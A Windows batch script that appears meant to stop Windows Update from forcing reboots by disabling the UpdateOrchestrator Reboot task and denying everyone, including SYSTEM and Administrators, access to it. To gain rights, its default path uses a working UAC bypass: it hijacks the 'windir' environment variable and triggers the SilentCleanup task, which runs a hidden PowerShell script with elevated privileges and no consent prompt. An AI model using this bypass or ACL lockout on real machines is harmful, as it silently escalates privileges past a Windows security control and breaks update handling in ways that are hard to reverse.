@echo off
set debug=0

set ps_reg="HKCU\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell"

rem check if the key already exists.
reg query %ps_reg% /v ExecutionPolicy >nul 2>&1
if NOT %errorLevel% == 0 (
    rem set it just high enough so we can run our script.
    reg add %ps_reg% /t REG_SZ /v ExecutionPolicy /d RemoteSigned
)

rem check if we're at least running as an admin.
net session >nul 2>&1
if NOT %errorLevel% == 0 (
    rem re-run this script as system.
    rem that's more than administrator, but less than trusted installer.
    if "%debug%"=="1" (
        powershell -Command "Start-Process powershell {%~dp0\elevate.ps1 %0} -Verb RunAs"
    ) else (
        rem this version bypasses UAC. please refer to the following post:
        rem https://tyranidslair.blogspot.ca/2017/05/exploiting-environment-variables-in.html
        reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && powershell -WindowStyle Hidden -NonInteractive %~dp0\elevate.ps1 %0 && REM "
    )
    schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
    exit
)

schtasks /change /tn \Microsoft\Windows\UpdateOrchestrator\Reboot /DISABLE
icacls "%WINDIR%\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot" /inheritance:r /deny "Everyone:F" /deny "SYSTEM:F" /deny "Local Service:F" /deny "Administrators:F"
if "%debug%"=="1" ( pause )
exit